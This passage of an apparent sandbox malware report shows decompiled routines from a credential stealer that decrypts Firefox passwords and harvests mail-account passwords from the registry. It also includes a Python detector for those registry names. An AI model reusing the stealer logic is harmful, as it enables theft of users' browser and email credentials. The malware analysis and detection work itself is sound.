					_t61 = ReadProcessMemory(_v4,  *0x416c58,  &_a264, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00406585( &_a2080,  &_a264, 0);
						_pop(_t102);
					}
					_t62 = E0040629C();
					__eflags = _t62;
					if(_t62 == 0) {
						E0040E056();
					} else {
						E0040E0DA();
					}
					__eflags =  *0x417514;
					if(__eflags != 0) {
						L17:
						_a776 = 0;
						memset( &_a780, 0, 0x114);
						_t122 =  *0x416e7c; // 0x0
						_t134 = _t134 + 0xc;
						_t66 = GetCurrentProcessId();
						 *0x417108 = 0;
						E0040E255(_t102, __eflags, _t66, _t122);
						__eflags =  *0x417108;
						if( *0x417108 != 0) {
							memcpy( &_a776, 0x416ff0, 0x118);
							_t134 = _t134 + 0xc;
							__eflags =  *0x417108;
							if( *0x417108 != 0) {
								strcpy( &_v0, E004061E6( &_a784));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x417518;
						if(__eflags == 0) {
							L20:
							sprintf( &_a3104, "Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n",  *0x416e70,  *0x416e7c,  &_v0,  *0x416c50,  *0x416c44,  *0x416c4c,  *0x416c48,  *0x416c40,  *0x416c3c,  *0x416c54,  *0x416c64,  *0x416c58,  &_a1056,  &_a2080);
							SetDlgItemTextA(_a4, 0x3ea,  &_a3104);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t44 == 1) {
					_t125 = _a12;
					if(_t125 >> 0x10 == 0) {
						if(_t125 == 3) {
							_t93 = GetDlgItem(_a4, 0x3ea);
							_v4 = _t93;
							SendMessageA(_t93, 0xb1, 0, 0xffff);
							SendMessageA(_v4, 0x301, 0, 0);
							SendMessageA(_v4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}

APIs
Strings
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040DE02
• {Unknown}, xrefs: 0040DBFB
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
• API String ID: 138940113-3474136107
• Opcode ID: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
• Instruction ID: 36e6f19d437acde9dae1843bd1f228cb1d7049f577ea92cd8b51c55dddb48a69
• Opcode Fuzzy Hash: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
• Instruction Fuzzy Hash: 6D711C72844244BFD721EF51DC41EEB3BEDEF94344F00843EF649921A0DA399A58CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040DEEE(struct HINSTANCE__** __esi, intOrPtr _a4) {
                                                                                                                                                    				void _v267;
                                                                                                                                                    				char _v268;
                                                                                                                                                    				void _v531;
                                                                                                                                                    				char _v532;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				int _t39;
                                                                                                                                                    				void* _t44;
                                                                                                                                                    				struct HINSTANCE__* _t53;
                                                                                                                                                    				struct HINSTANCE__* _t56;
                                                                                                                                                    				struct HINSTANCE__** _t69;
                                                                                                                                                    
                                                                                                                                                    				_t69 = __esi;
                                                                                                                                                    				_v268 = 0;
                                                                                                                                                    				memset( &_v267, 0, 0x104);
                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                    					E004060D0(0x104,  &_v268, _a4);
                                                                                                                                                    				}
                                                                                                                                                    				if(_v268 != 0) {
                                                                                                                                                    					GetCurrentDirectoryA(0x104,  &(_t69[8]));
                                                                                                                                                    					SetCurrentDirectoryA( &_v268);
                                                                                                                                                    					_v532 = 0;
                                                                                                                                                    					memset( &_v531, 0, 0x104);
                                                                                                                                                    					_t39 = strlen("nss3.dll");
                                                                                                                                                    					_t13 = strlen( &_v268) + 1; // 0x1
                                                                                                                                                    					if(_t39 + _t13 >= 0x104) {
                                                                                                                                                    						_v532 = 0;
                                                                                                                                                    					} else {
                                                                                                                                                    						E004062AD( &_v532,  &_v268, "nss3.dll");
                                                                                                                                                    					}
                                                                                                                                                    					_t44 = GetModuleHandleA( &_v532);
                                                                                                                                                    					 *_t69 = _t44;
                                                                                                                                                    					if(_t44 != 0) {
                                                                                                                                                    						L9:
                                                                                                                                                    						_t69[1] = GetProcAddress( *_t69, "NSS_Init");
                                                                                                                                                    						_t69[2] = GetProcAddress( *_t69, "NSS_Shutdown");
                                                                                                                                                    						_t69[3] = GetProcAddress( *_t69, "PK11_GetInternalKeySlot");
                                                                                                                                                    						_t69[4] = GetProcAddress( *_t69, "PK11_FreeSlot");
                                                                                                                                                    						_t69[5] = GetProcAddress( *_t69, "PK11_CheckUserPassword");
                                                                                                                                                    						_t69[6] = GetProcAddress( *_t69, "PK11_Authenticate");
                                                                                                                                                    						_t69[7] = GetProcAddress( *_t69, "PK11SDR_Decrypt");
                                                                                                                                                    					} else {
                                                                                                                                                    						_t53 = LoadLibraryExA( &_v532, _t44, 8);
                                                                                                                                                    						 *_t69 = _t53;
                                                                                                                                                    						if(_t53 != 0) {
                                                                                                                                                    							goto L9;
                                                                                                                                                    						} else {
                                                                                                                                                    							E0040DEA9();
                                                                                                                                                    							_t56 = LoadLibraryExA( &_v532, 0, 8);
                                                                                                                                                    							 *_t69 = _t56;
                                                                                                                                                    							if(_t56 != 0) {
                                                                                                                                                    								goto L9;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				return 0 |  *_t69 != 0x00000000;
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040DF0F
                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                                                                                                    • memset.MSVCRT ref: 0040DF62
                                                                                                                                                    • strlen.MSVCRT ref: 0040DF6C
                                                                                                                                                    • strlen.MSVCRT ref: 0040DF7A
                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                                                                                                    • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                                                                                                    • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E044
                                                                                                                                                      • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                                                                      • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
                                                                                                                                                    • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                                                                    • API String ID: 1296682400-4029219660
                                                                                                                                                    • Opcode ID: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                                                                                                    • Instruction ID: fea3831f464983b0eef39fbf9020f470c327cc413978f8e1f023dd725517e53d
                                                                                                                                                    • Opcode Fuzzy Hash: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                                                                                                    • Instruction Fuzzy Hash: 2A4187B1940309AACB20AF75CC49FC6BBF8AF64704F10496AE185E2191E7B996D4CF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 35%
                                                                                                                                                    			E00402606(void* __ecx, void* __fp0) {
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t58;
                                                                                                                                                    				void* _t59;
                                                                                                                                                    				void* _t67;
                                                                                                                                                    				void* _t70;
                                                                                                                                                    				void* _t73;
                                                                                                                                                    				void* _t87;
                                                                                                                                                    				signed int _t90;
                                                                                                                                                    				void* _t92;
                                                                                                                                                    				signed int _t96;
                                                                                                                                                    				intOrPtr _t100;
                                                                                                                                                    				intOrPtr _t101;
                                                                                                                                                    				void* _t103;
                                                                                                                                                    				void* _t105;
                                                                                                                                                    				void* _t106;
                                                                                                                                                    				void* _t108;
                                                                                                                                                    				void* _t114;
                                                                                                                                                    
                                                                                                                                                    				_t114 = __fp0;
                                                                                                                                                    				_t92 = __ecx;
                                                                                                                                                    				_t103 = _t105 - 0x6c;
                                                                                                                                                    				_t106 = _t105 - 0x474;
                                                                                                                                                    				 *(_t103 + 0x4c) = "POP3 User Name";
                                                                                                                                                    				 *(_t103 + 0x50) = "IMAP User Name";
                                                                                                                                                    				 *(_t103 + 0x54) = "HTTPMail User Name";
                                                                                                                                                    				 *(_t103 + 0x58) = "SMTP USer Name";
                                                                                                                                                    				 *(_t103 + 0x1c) = "POP3 Server";
                                                                                                                                                    				 *(_t103 + 0x20) = "IMAP Server";
                                                                                                                                                    				 *(_t103 + 0x24) = "HTTPMail Server";
                                                                                                                                                    				 *(_t103 + 0x28) = "SMTP Server";
                                                                                                                                                    				 *(_t103 + 0x3c) = "POP3 Password2";
                                                                                                                                                    				 *(_t103 + 0x40) = "IMAP Password2";
                                                                                                                                                    				 *(_t103 + 0x44) = "HTTPMail Password2";
                                                                                                                                                    				 *(_t103 + 0x48) = "SMTP Password2";
                                                                                                                                                    				 *(_t103 + 0x2c) = "POP3 Port";
                                                                                                                                                    				 *(_t103 + 0x30) = "IMAP Port";
                                                                                                                                                    				 *(_t103 + 0x34) = "HTTPMail Port";
                                                                                                                                                    				 *(_t103 + 0x38) = "SMTP Port";
                                                                                                                                                    				 *(_t103 + 0x5c) = "POP3 Secure Connection";
                                                                                                                                                    				 *(_t103 + 0x60) = "IMAP Secure Connection";
                                                                                                                                                    				 *(_t103 + 0x64) = "HTTPMail Secure Connection";
                                                                                                                                                    				 *(_t103 + 0x68) = "SMTP Secure Connection";
                                                                                                                                                    				_t90 = 0;
                                                                                                                                                    				do {
                                                                                                                                                    					 *(_t103 - 0x64) = 0;
                                                                                                                                                    					memset(_t103 - 0x63, 0, 0x7f);
                                                                                                                                                    					_push(_t103 - 0x64);
                                                                                                                                                    					_t96 = _t90 << 2;
                                                                                                                                                    					_push( *((intOrPtr*)(_t103 + _t96 + 0x4c)));
                                                                                                                                                    					_push( *((intOrPtr*)(_t103 + 0x78)));
                                                                                                                                                    					_t58 = 0x7f;
                                                                                                                                                    					_t59 = E0040EB80(_t58, _t92);
                                                                                                                                                    					_t106 = _t106 + 0x18;
                                                                                                                                                    					if(_t59 == 0) {
                                                                                                                                                    						E004021D8(_t103 - 0x408);
                                                                                                                                                    						strcpy(_t103 - 0x1f4, _t103 - 0x64);
                                                                                                                                                    						_t100 =  *((intOrPtr*)(_t103 + 0x78));
                                                                                                                                                    						 *((intOrPtr*)(_t103 - 0x37c)) =  *((intOrPtr*)(_t103 + 0x7c));
                                                                                                                                                    						_t34 = _t90 + 1; // 0x1
                                                                                                                                                    						 *((intOrPtr*)(_t103 - 0x1f8)) = _t34;
                                                                                                                                                    						_push(_t103 - 0x2f8);
                                                                                                                                                    						_push( *((intOrPtr*)(_t103 + _t96 + 0x1c)));
                                                                                                                                                    						_push(_t100);
                                                                                                                                                    						_t67 = 0x7f;
                                                                                                                                                    						E0040EB80(_t67, _t92);
                                                                                                                                                    						_push(_t103 - 0x3fc);
                                                                                                                                                    						_push("SMTP Display Name");
                                                                                                                                                    						_push(_t100);
                                                                                                                                                    						_t70 = 0x7f;
                                                                                                                                                    						E0040EB80(_t70, _t92);
                                                                                                                                                    						_push(_t103 - 0x378);
                                                                                                                                                    						_push("SMTP Email Address");
                                                                                                                                                    						_push(_t100);
                                                                                                                                                    						_t73 = 0x7f;
                                                                                                                                                    						E0040EB80(_t73, _t92);
                                                                                                                                                    						_t108 = _t106 + 0x2c;
                                                                                                                                                    						if(_t90 != 3) {
                                                                                                                                                    							_push(_t103 - 0x278);
                                                                                                                                                    							_push("SMTP Server");
                                                                                                                                                    							_push(_t100);
                                                                                                                                                    							_t87 = 0x7f;
                                                                                                                                                    							E0040EB80(_t87, _t92);
                                                                                                                                                    							_t108 = _t108 + 0xc;
                                                                                                                                                    						}
                                                                                                                                                    						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x2c)), _t103 - 0x74);
                                                                                                                                                    						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x5c)), _t103 - 0x70);
                                                                                                                                                    						_t106 = _t108 + 0x18;
                                                                                                                                                    						_t101 =  *((intOrPtr*)(_t103 + 0x74));
                                                                                                                                                    						E0040246C(_t101, _t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x3c)), _t103 - 0x174, 0);
                                                                                                                                                    						strcpy(_t103 - 0xf4, _t101 + 0xa9c);
                                                                                                                                                    						_pop(_t92);
                                                                                                                                                    						_t59 = E00402407(_t103 - 0x408, _t114, _t101);
                                                                                                                                                    					}
                                                                                                                                                    					_t90 = _t90 + 1;
                                                                                                                                                    				} while (_t90 < 4);
                                                                                                                                                    				return _t59;
                                                                                                                                                    			}

                                                                                                                                                     Instruction addresses (gutter column collapsed): the decompiled routine above spans 0x00402606 to 0x004027cd.


                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004026AE
                                                                                                                                                      • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?,?,7554ED80,?,00000000), ref: 004026EC
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 004027A9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcpy$QueryValuememset
                                                                                                                                                    • String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                    • API String ID: 3373037483-1627711381
                                                                                                                                                    • Opcode ID: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                                                                                                                    • Instruction ID: d93c2979c5964ee18a3e8d610d8756237e52e0a5809c5516356d8c5187ea57d6
                                                                                                                                                    • Opcode Fuzzy Hash: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                                                                                                                    • Instruction Fuzzy Hash: E04186B190021CAADB10DF91DE49ADE37B8EF04348F10446BFD18E7191D3B89699CF98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
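
The routine above is the sample's mail-account harvesting loop: for each of the four protocol prefixes (POP3, IMAP, HTTPMail, SMTP) it queries the same set of registry values through E0040EB80 (which calls RegQueryValueExA, per the APIs list), copies user name, server, port, secure-connection flag and "Password2" into a per-account record, and passes that record buffer to E00402407. The routine that follows in the report (E004027D0) uses the shorter "<proto> Password" / "<proto> User" names. That value-name table is a cheap static indicator for this code. The Python below is an added example written for this page, not code from the report or from the sample: it scans a byte blob (a PE section or a memory dump) for those value names as null-terminated ASCII or UTF-16LE strings, requires complete per-protocol rows rather than isolated names before flagging, and separately checks for the literal "SMTP USer Name" spelling shown in the String ID list. The two blobs inside the block are constructed inputs, and the thresholds are the example's own choices.

```python
"""
Added example (not part of the Joe Sandbox report or the analysed sample):
flag binaries or memory dumps that carry the mail-account registry value
names harvested by the decompiled routine. All inputs below are constructed.
"""
from typing import Dict, List, Set

# Table rebuilt from the decompiled loop: four protocol prefixes crossed with
# the per-account values it reads (user name, server, port, TLS flag, password).
OE_PROTOCOLS = ("POP3", "IMAP", "HTTPMail", "SMTP")
OE_SUFFIXES = ("User Name", "Server", "Port", "Secure Connection", "Password2")
OE_EXTRA = ("SMTP Display Name", "SMTP Email Address")

# Shorter names from the routine E004027D0 that follows in the report
# (only those visible on this page are listed).
OUTLOOK_NAMES = (
    "POP3 Password", "IMAP Password", "HTTP Password", "SMTP Password",
    "POP3 User", "IMAP User", "HTTP User",
)

# Exact spelling in the report's String ID list; the odd capitalisation is a
# cheap literal indicator for this particular code.
MAILPV_LITERAL = b"SMTP USer Name"


def expected_names() -> Set[str]:
    names = {f"{p} {s}" for p in OE_PROTOCOLS for s in OE_SUFFIXES}
    names.update(OE_EXTRA)
    names.update(OUTLOOK_NAMES)
    return names


def _has_terminated(hay: bytes, needle: bytes, term: bytes) -> bool:
    """True if needle occurs in hay followed by term (or at the very end).

    Requiring the terminator keeps "POP3 Password" from matching inside
    "POP3 Password2" and "POP3 User" from matching inside "POP3 User Name".
    """
    start = 0
    while True:
        i = hay.find(needle, start)
        if i < 0:
            return False
        end = i + len(needle)
        if end == len(hay) or hay[end:end + len(term)] == term:
            return True
        start = i + 1


def find_value_names(blob: bytes) -> Set[str]:
    """Return the expected value names present as ASCII or UTF-16LE C strings.

    Matching is case-insensitive so the "SMTP USer Name" spelling still counts
    as the SMTP user-name field; bytes.lower() only touches ASCII letters, so
    it is safe on the UTF-16LE form as well.
    """
    hay = blob.lower()
    hits: Set[str] = set()
    for name in expected_names():
        low = name.lower()
        if (_has_terminated(hay, low.encode("ascii"), b"\x00")
                or _has_terminated(hay, low.encode("utf-16-le"), b"\x00\x00")):
            hits.add(name)
    return hits


def classify(blob: bytes) -> Dict[str, object]:
    """Score a blob the way the loop structure suggests: complete rows matter.

    One isolated name is normal for any mail client; two full protocol rows
    (all five per-account fields) or a large cluster mirrors the harvesting
    loop. Thresholds are this example's own choice, not from the report.
    """
    hits = find_value_names(blob)
    complete: List[str] = [
        p for p in OE_PROTOCOLS if all(f"{p} {s}" in hits for s in OE_SUFFIXES)
    ]
    literal = MAILPV_LITERAL in blob
    suspicious = len(complete) >= 2 or len(hits) >= 10 or literal
    return {
        "hits": sorted(hits),
        "complete_protocols": complete,
        "mailpv_literal": literal,
        "suspicious": suspicious,
    }


# Constructed inputs: a fake .rdata run of null-terminated literals laid out
# like the decompiled table (with the report's spelling), and a benign blob
# that merely mentions two server names.
SUSPECT_BLOB = b"\x00".join(
    [f"{p} {s}".encode("ascii") for p in OE_PROTOCOLS for s in OE_SUFFIXES]
    + [e.encode("ascii") for e in OE_EXTRA]
).replace(b"SMTP User Name", MAILPV_LITERAL) + b"\x00"

BENIGN_BLOB = (b"POP3 Server\x00Settings\x00"
               + "IMAP Server".encode("utf-16-le") + b"\x00\x00")

if __name__ == "__main__":
    for label, blob in (("suspect", SUSPECT_BLOB), ("benign", BENIGN_BLOB)):
        r = classify(blob)
        print(f"{label}: suspicious={r['suspicious']} hits={len(r['hits'])} "
              f"rows={r['complete_protocols']} literal={r['mailpv_literal']}")
```

Run it against a dumped 0x400000 image or a raw .rdata section rather than the packed file: the report's own unpacking signatures say the strings only exist after the PE header and section rights are rewritten in memory, so a scan of the original sample on disk is expected to come back clean.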

                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                    			E004027D0(void* __fp0) {
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t66;
                                                                                                                                                    				signed int _t92;
                                                                                                                                                    				void* _t95;
                                                                                                                                                    				intOrPtr _t109;
                                                                                                                                                    				void* _t111;
                                                                                                                                                    				void* _t113;
                                                                                                                                                    				void* _t114;
                                                                                                                                                    				void* _t121;
                                                                                                                                                    
                                                                                                                                                    				_t121 = __fp0;
                                                                                                                                                    				_t111 = _t113 - 0x70;
                                                                                                                                                    				_t114 = _t113 - 0x474;
                                                                                                                                                    				 *(_t111 + 0x40) = "POP3 Password";
                                                                                                                                                    				 *(_t111 + 0x44) = "IMAP Password";
                                                                                                                                                    				 *(_t111 + 0x48) = "HTTP Password";
                                                                                                                                                    				 *(_t111 + 0x4c) = "SMTP Password";
                                                                                                                                                    				 *(_t111 + 0x50) = "POP3 User";
                                                                                                                                                    				 *(_t111 + 0x54) = "IMAP User";
                                                                                                                                                    				 *(_t111 + 0x58) = "HTTP User";
                                                                                                                                                    				 *(_t111 + 0x5c) = "SMTP User";
                                                                                                                                                    				 *(_t111 + 0x20) = "POP3 Server";
                                                                                                                                                    				 *(_t111 + 0x24) = "IMAP Server";
                                                                                                                                                    				 *(_t111 + 0x28) = "HTTP Server URL";
                                                                                                                                                    				 *(_t111 + 0x2c) = "SMTP Server";
                                                                                                                                                    				 *(_t111 + 0x30) = "POP3 Port";
                                                                                                                                                    				 *(_t111 + 0x34) = "IMAP Port";
                                                                                                                                                    				 *(_t111 + 0x38) = "HTTP Port";
                                                                                                                                                    				 *(_t111 + 0x3c) = "SMTP Port";
                                                                                                                                                    				 *(_t111 + 0x60) = "POP3 Use SPA";
                                                                                                                                                    				 *(_t111 + 0x64) = "IMAP Use SPA";
                                                                                                                                                    				 *(_t111 + 0x68) = "HTTPMail Use SSL";
                                                                                                                                                    				 *(_t111 + 0x6c) = "SMTP Use SSL";
                                                                                                                                                    				_t92 = 0;
                                                                                                                                                    				do {
                                                                                                                                                    					 *(_t111 - 0x60) = 0;
                                                                                                                                                    					memset(_t111 - 0x5f, 0, 0x7f);
                                                                                                                                                    					_t114 = _t114 + 0xc;
                                                                                                                                                    					_t100 = _t92 << 2;
                                                                                                                                                    					_t66 = E004029A7(_t111 - 0x60,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + (_t92 << 2) + 0x50)));
                                                                                                                                                    					if(_t66 != 0) {
                                                                                                                                                    						E004021D8(_t111 - 0x404);
                                                                                                                                                    						strcpy(_t111 - 0x1f0, _t111 - 0x60);
                                                                                                                                                    						_pop(_t95);
                                                                                                                                                    						 *((intOrPtr*)(_t111 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x78)) + 0xb1c));
                                                                                                                                                    						_t37 = _t92 + 1; // 0x1
                                                                                                                                                    						 *((intOrPtr*)(_t111 - 0x1f4)) = _t37;
                                                                                                                                                    						E004029A7(_t111 - 0x2f4,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x20)));
                                                                                                                                                    						E004029A7(_t111 - 0x3f8,  *((intOrPtr*)(_t111 + 0x7c)), "Display Name");
                                                                                                                                                    						E004029A7(_t111 - 0x374,  *((intOrPtr*)(_t111 + 0x7c)), "Email");
                                                                                                                                                    						if(_t92 != 3) {
                                                                                                                                                    							E004029A7(_t111 - 0x274,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Server");
                                                                                                                                                    							E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Port", _t111 - 0x68);
                                                                                                                                                    							_t114 = _t114 + 0xc;
                                                                                                                                                    						}
                                                                                                                                                    						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x30)), _t111 - 0x70);
                                                                                                                                                    						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x60)), _t111 - 0x6c);
                                                                                                                                                    						_t109 =  *((intOrPtr*)(_t111 + 0x78));
                                                                                                                                                    						_t114 = _t114 + 0x18;
                                                                                                                                                    						E0040246C(_t109, _t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x40)), _t111 - 0x170, 1);
                                                                                                                                                    						strcpy(_t111 - 0xf0, _t109 + 0xa9c);
                                                                                                                                                    						_t66 = E00402407(_t111 - 0x404, _t121, _t109);
                                                                                                                                                    					}
                                                                                                                                                    					_t92 = _t92 + 1;
                                                                                                                                                    				} while (_t92 < 4);
                                                                                                                                                    				return _t66;
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00402878
                                                                                                                                                      • Part of subcall function 004029A7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029E9
                                                                                                                                                    • strcpy.MSVCRT(?,?,7554ED80,?,00000000), ref: 004028B2
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?,?,?,?,?,7554ED80,?,00000000), ref: 00402980
                                                                                                                                                      • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcpy$ByteCharMultiQueryValueWidememset
                                                                                                                                                    • String ID: Display Name$Email$HTTP Password$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP Password$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3 Password$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$SMTP Password$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                    • API String ID: 2416467034-4086712241
                                                                                                                                                    • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                                                                                    • Instruction ID: 2a04afc1b401ca52673312b513a052c1616a462ab9372f8060d899744f0eb97e
                                                                                                                                                    • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                                                                                    • Instruction Fuzzy Hash: FF513EB150025DABCF24DF61DE499DD7BB8FF04308F10416AF924A6191D3B999A9CF88
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                    			E0040F435(CHAR* __eax) {
                                                                                                                                                    				void* _v8;
                                                                                                                                                    				int _v12;
                                                                                                                                                    				void _v267;
                                                                                                                                                    				char _v268;
                                                                                                                                                    				void _v531;
                                                                                                                                                    				char _v532;
                                                                                                                                                    				void _v787;
                                                                                                                                                    				char _v788;
                                                                                                                                                    				void _v1051;
                                                                                                                                                    				char _v1052;
                                                                                                                                                    				void _v2075;
                                                                                                                                                    				char _v2076;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t45;
                                                                                                                                                    				void* _t59;
                                                                                                                                                    				char* _t60;
                                                                                                                                                    				char* _t71;
                                                                                                                                                    				char* _t75;
                                                                                                                                                    				void* _t84;
                                                                                                                                                    				CHAR* _t89;
                                                                                                                                                    				void* _t90;
                                                                                                                                                    				void* _t91;
                                                                                                                                                    				void* _t92;
